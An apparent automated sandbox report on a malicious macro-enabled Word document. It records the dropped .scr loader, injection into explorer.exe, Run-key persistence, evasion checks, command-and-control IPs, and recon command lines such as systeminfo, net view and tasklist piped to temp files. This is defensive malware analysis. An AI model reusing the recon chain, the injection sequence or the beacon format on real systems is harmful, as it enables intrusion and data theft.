Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0038DEC8 NtCreateSection,memset,RtlNtStatusToDosError,NtClose
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037DF75 NtUnmapViewOfSection,RtlNtStatusToDosError,HeapFree
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0038CF9B memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037D7EE memset,CreateMutexA,GetLastError,CloseHandle,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,RtlAllocateHeap,LoadLibraryA,RtlAllocateHeap,wsprintfA
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_003A3040 NtProtectVirtualMemory,NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00632A7B NtOpenProcess,NtOpenProcessToken,NtClose,NtClose
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00633B27 memset,NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00631C29 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0063271B NtCreateSection,memset,RtlNtStatusToDosError,NtClose
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00633C1B NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_006326DC NtMapViewOfSection,RtlNtStatusToDosError

Two points worth reading out of these listings. First, the NtCreateSection / NtMapViewOfSection / NtUnmapViewOfSection / NtWriteVirtualMemory / NtGetContextThread / NtSetContextThread sequence in the dropped .scr (process 3) is the section-mapping form of process injection, which is what the Process Injection entries in the ATT&CK matrix refer to. Second, the 3_2_0141xxxx functions of the .scr and the 16_2_0063xxxx functions of avicbrkr.exe share their low-order offsets and their exact API sequences (2A7B, 271B, 3C1B, 1C29, 26DC, 3B27), so the same loader image is present in both processes at a different base address.
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0038D9D6 CreateProcessAsUserA
Creates mutexes
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Mutant created: \Sessions\2\BaseNamedObjects\MutexHelper
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Mutant created: \Sessions\2\BaseNamedObjects\{04078505-93E6-D63A-3D78-776AC12C9B3E}
Detected potential crypto function
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01414F58
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00380819
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037F8F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00374A27
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00383C19
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00384403
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00395C4C
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_003824E6
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037FCC4
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00384CC3
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037E764
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00634F58
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: e41ZuYVo64.docm | OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function Document_Open | Name: Document_Open
Document contains embedded VBA macros
Source: e41ZuYVo64.docm | OLE indicator, VBA macros: true
Document contains no OLE stream with summary information
Source: e41ZuYVo64.docm | OLE indicator has summary info: false
Document has an unknown application name
Source: e41ZuYVo64.docm | OLE indicator application name: unknown
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: e41ZuYVo64.docm | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Reads the hosts file
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (logged twice)
Source: C:\Windows\System32\nslookup.exe | File read: C:\Windows\System32\drivers\etc\hosts
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)
Source: 152E.bin1.13.dr | Binary string: Boot Device: \Device\HarddiskVolume1
Classification label
Source: classification engine | Classification label: mal100.spre.phis.bank.troj.spyw.expl.evad.winDOCM@39/29@13/5
Contains functionality to enum processes or threads
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037B652 CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,Thread32Next (thread enumeration followed by QueueUserAPC on each opened thread is the APC-injection pattern, not plain discovery)
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$1ZuYVo64.docm
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\CVR446E.tmp
Document contains summary information with irregular field values
Source: e41ZuYVo64.docm | OLE document summary: title field not present or empty
Source: e41ZuYVo64.docm | OLE document summary: author field not present or empty
Source: e41ZuYVo64.docm | OLE document summary: edited time not present or 0
Found command line output
The console writes are UTF-16; the report rendered the interleaved NUL bytes as dots and also logged the buffer states between messages, which are omitted here.
Source: C:\Windows\System32\systeminfo.exe | Console Write: Loading Operating System Information
Source: C:\Windows\System32\systeminfo.exe | Console Write: Loading Computer Information
Source: C:\Windows\System32\systeminfo.exe | Console Write: Loading Processor Information
Source: C:\Windows\System32\systeminfo.exe | Console Write: Loading BIOS Information
Source: C:\Windows\System32\systeminfo.exe | Console Write: Loading Input Locale Information
Source: C:\Windows\System32\systeminfo.exe | Console Write: Loading TimeZone Information
Source: C:\Windows\System32\systeminfo.exe | Console Write: Loading Profile Information
Source: C:\Windows\System32\systeminfo.exe | Console Write: Loading Pagefile Information
Source: C:\Windows\System32\systeminfo.exe | Console Write: Loading Hotfix Information
Source: C:\Windows\System32\systeminfo.exe | Console Write: Loading Network Card Information
Source: C:\Windows\System32\net.exe | Console Write: System error 6118 has occurred. (Windows error 6118 is "The list of servers for this workgroup is not currently available": net view found no browse list in the isolated sandbox network, so the share enumeration returned nothing.)
Source: C:\Windows\System32\net.exeConsole Write: ..........................0.............................................r.r.e.d.............t.,.%t....,.......&.........Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: ....................a.+u..0.....................................................8...........t.,.%t..................8...Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: ..........................0.....................................................8...........t.,.%t....,.................Jump to behavior
Queries process information (via WMI, Win32_Process)
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\text.doc.16147.scr | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Users\user\text.doc.16147.scr C:\Users\user\text.doc.16147.scr
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
Source: unknown | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe 'C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\net.exe net view
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Users\user\text.doc.16147.scr C:\Users\user\text.doc.16147.scr
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe 'C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Uses an in-process (OLE) Automation server
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8D4B04E1-1331-11d0-81B8-00C04FD85AB4}\InprocServer32
Uses systeminfo.exe to query system information
Source: unknown | Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Uses tasklist.exe to query information about running processes
Source: unknown | Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Executable creates window controls seldom found in malware
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window found: window name: SysTabControl32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Data Obfuscation:

Document contains an embedded VBA with many randomly named variables
Source: e41ZuYVo64.docm | Stream path 'VBA/J04Xt' : High entropy of concatenated variable names
Source: e41ZuYVo64.docm | Stream path 'VBA/JtuJu' : High entropy of concatenated variable names
Source: e41ZuYVo64.docm | Stream path 'VBA/LKfy2' : High entropy of concatenated variable names
Source: e41ZuYVo64.docm | Stream path 'VBA/ThisDocument' : High entropy of concatenated variable names
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00390600 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 16_2_00390600
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01414F47 push ecx; ret 3_2_01414F57
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_003881D1 push ecx; mov dword ptr [esp], 00000002h 16_2_003881D2
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00395C3B push ecx; ret 16_2_00395C4B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037EF45 push 8B003994h; ret 16_2_0037EF50
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00634F47 push ecx; ret 16_2_00634F57

Persistence and Installation Behavior:

Drops PE files with a suspicious file extension
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\text.doc.16147.scr
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\text.doc.16147.scr
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\text.doc.16147.scr

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\text.doc.16147.scr
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\text.doc.16147.scr | Window found: window name: ProgMan
Creates an autostart registry key
Source: C:\Windows\explorer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Auxixpps

Hooking and other Techniques for Hiding and Protection:

Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe | IAT of a user mode module has changed: module: kernel32.dll function: CreateProcessW address: 75329000
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: kernel32.dll function: CreateProcessW new code: 0xE9 0x9C 0xC7 0x74 0x48 0x8A
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe | Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\D4A4208A-23CA-2629-4D48-07BAD1FC2B8E
Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Evasive VBA macro found (CPU number check)
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function Document_Open, API Environ("NUMBER_OF_PROCESSORS") Name: Document_Open
Found stalling execution ending in API Sleep call
Source: C:\Users\user\text.doc.16147.scr | Stalling execution: Execution stalls by calling Sleep graph_3-2763
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Stalling execution: Execution stalls by calling Sleep
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_ComputerSystem
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapter
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\Users\user\text.doc.16147.scr | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_3-2279
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | API coverage: 6.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\text.doc.16147.scr TID: 1660 | Thread sleep count: 68 > 30
Source: C:\Users\user\text.doc.16147.scr TID: 2728 | Thread sleep count: 67 > 30
Source: C:\Windows\explorer.exe TID: 1916 | Thread sleep time: -10560000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1916 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\systeminfo.exe TID: 624 | Thread sleep time: -780000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe TID: 3836 | Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe TID: 3252 | Thread sleep count: 67 > 30
Source: C:\Windows\System32\tasklist.exe TID: 2636 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\tasklist.exe TID: 2636 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\driverquery.exe TID: 2116 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\driverquery.exe TID: 2116 | Thread sleep time: -60000s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01413ECF CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,HeapFree,HeapFree, 3_2_01413ECF
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00387121 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 16_2_00387121
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_003874A1 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 16_2_003874A1
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00391663 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 16_2_00391663
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: explorer.exe, 00000005.00000000.1115390919.03B66000.00000004.sdmp | Binary or memory string: vmbusres.dllPO
Program exit points
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | API call chain: ExitProcess graph end node
Queries a list of all running processes
Source: C:\Users\user\text.doc.16147.scr | Process information queried: ProcessInformation

Anti Debugging:

Checks for debuggers (devices)
Source: C:\Windows\explorer.exe | File opened: C:\Windows\WinSxS\FileMaps\users_user_appdata_roaming_microsoft_aecaider_3fc0094e727c3194.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\systeminfo.exe | System information queried: KernelDebuggerInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00390600 RegOpenKeyA, LoadLibraryA, GetProcAddress, GetLastError, FreeLibrary, GetLastError, RegCloseKey
Enables debug privileges
Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037DCD8 ConvertStringSecurityDescriptorToSecurityDescriptorA, StrRChrA, _strupr, lstrlen, CreateEventA, RtlAddVectoredExceptionHandler, GetLastError, RtlRemoveVectoredExceptionHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0038AB35 RtlExitUserThread, RtlAddVectoredExceptionHandler, OpenEventA, FreeLibrary, HeapFree

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 37.152.176.90 80
Source: C:\Windows\explorer.exe | Network Connect: 178.169.196.83 80
Source: C:\Windows\explorer.exe | Network Connect: 46.139.176.151 80
Allocates memory in foreign processes
Source: C:\Users\user\text.doc.16147.scr | Memory allocated: C:\Windows\explorer.exe base: 1D70000 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory allocated: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 1E0000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Users\user\text.doc.16147.scr | Memory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute and read and write
Source: C:\Users\user\text.doc.16147.scr | Memory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute read
Source: C:\Users\user\text.doc.16147.scr | Memory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute and read and write
Source: C:\Users\user\text.doc.16147.scr | Memory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute read
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\text.doc.16147.scr | Thread created: C:\Windows\explorer.exe EIP: 76FDF515
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\text.doc.16147.scr | Memory written: PID: 3000 base: 76FDF515 value: EB
Source: C:\Users\user\text.doc.16147.scr | Memory written: PID: 3000 base: 1D70000 value: 15
Source: C:\Users\user\text.doc.16147.scr | Memory written: PID: 3000 base: 76FDF515 value: 8B
Maps a DLL or memory area into another process
Source: C:\Users\user\text.doc.16147.scr | Section loaded: unknown target pid: 3000 protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\text.doc.16147.scr | Thread register set: target process: 3000
Source: C:\Windows\explorer.exe | Thread register set: target process: 3824
Writes to foreign memory regions
Source: C:\Users\user\text.doc.16147.scr | Memory written: C:\Windows\explorer.exe base: 76FDF515
Source: C:\Users\user\text.doc.16147.scr | Memory written: C:\Windows\explorer.exe base: 1D70000
Source: C:\Users\user\text.doc.16147.scr | Memory written: C:\Windows\explorer.exe base: 76FDF515
Source: C:\Windows\explorer.exe | Memory written: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 496CB5
Source: C:\Windows\explorer.exe | Memory written: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 1E0000
Source: C:\Windows\explorer.exe | Memory written: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 496CB5
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\driverquery.exe driverquery.exe
May try to detect the Windows Explorer process (often used for injection)
Source: explorer.exe, 00000005.00000000.1108073105.00D40000.00000002.sdmp, avicbrkr.exe, 00000010.00000002.1218902404.007A0000.00000002.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.1108073105.00D40000.00000002.sdmp, avicbrkr.exe, 00000010.00000002.1218902404.007A0000.00000002.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.1108073105.00D40000.00000002.sdmp, avicbrkr.exe, 00000010.00000002.1218902404.007A0000.00000002.sdmp | Binary or memory string: Shell_TrayWnd
Source: text.doc.16147.scr, 00000003.00000002.1149445314.01417000.00000004.sdmp | Binary or memory string: ProgMan
Source: text.doc.16147.scr, 00000003.00000002.1149445314.01417000.00000004.sdmp | Binary or memory string: 64RtlSetUnhandledExceptionFilterSystemRoot%08X-%04X-%04X-%04X-%08X%04X{%08X-%04X-%04X-%04X-%08X%04X}ADVAPI32.DLL*.*LdrGetProcedureAddressRtlExitUserThreadCreateRemoteThreadZwWriteVirtualMemoryLdrLoadDllZwProtectVirtualMemorykernelbaseLdrRegisterDllNotificationLdrUnregisterDllNotification\.exe%TEMP%\LowCreateProcessACreateProcessWCreateProcessAsUserACreateProcessAsUserW"%S" "%S"version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%srunascmd.exeLow\DllRegisterServer/C "copy "%s" "%s" /y && rundll32 "%s",%S"/C "copy "%s" "%s" /y && "%s" "%s""ProgManMicrosoft
Source: explorer.exe, 00000005.00000000.1099934971.000ED000.00000004.sdmp | Binary or memory string: Progmanp

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0038F3B0 cpuid
Contains functionality to create pipes for IPC
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037C19E CreateNamedPipeA, CreateThread, GetLastError, CloseHandle, GetLastError
Contains functionality to query local / system time
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01414A4D GetCurrentThreadId, GetSystemTimeAsFileTime, GetTempFileNameA, PathFindExtensionA, lstrcpy
Contains functionality to query windows version
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_014129A4 CreateEventA, GetVersion, GetCurrentProcessId, OpenProcess, GetLastError
Queries the cryptographic machine GUID
Source: C:\Windows\System32\systeminfo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings
Source: C:\Windows\explorer.exe | File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js

Stealing of Sensitive Information:

Searches for Windows Mail specific files
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
